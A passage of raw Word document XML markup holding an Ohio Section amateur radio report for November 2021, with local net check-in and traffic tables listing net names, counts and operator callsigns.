      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>38</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233DB24B" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10EDA344" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">OHIO SECTION LOCAL NETS – </w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>NOVEMBER 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079D2E24" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33FFC4AA" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>NET</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  QNI</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>QTC</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>QTR</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>SESSIONS</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>N/M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76288053" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>BRTN</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  163</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>90</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>429</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>W8DJG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACFF6CD" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>COTN</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  265</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>79</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>476</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>KD8TTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673BD9AE" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>MVTN</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   29</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> 55</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>KC8HTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1AE5CA" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>NWOH ARES  274</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>154</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>459</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>N8TNV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EE60B4" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>TATN</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  387</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> 73</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>374</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>WG8Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C00D001" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>TCTTN</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  141</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> 26</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>321</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>WB8YYS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3203B2" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="545CB539" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C464E32" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0727018D" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="247A2F60" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6327AFBF" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5860DFC7" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17EC471D" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66387E71" w14:textId="1775A94A" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>OHIO SECTION TRAFFIC REPORTS – NOVEMBER 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2057AB37" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E50219D" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>AC8NP-57</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>K8OVO-3</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
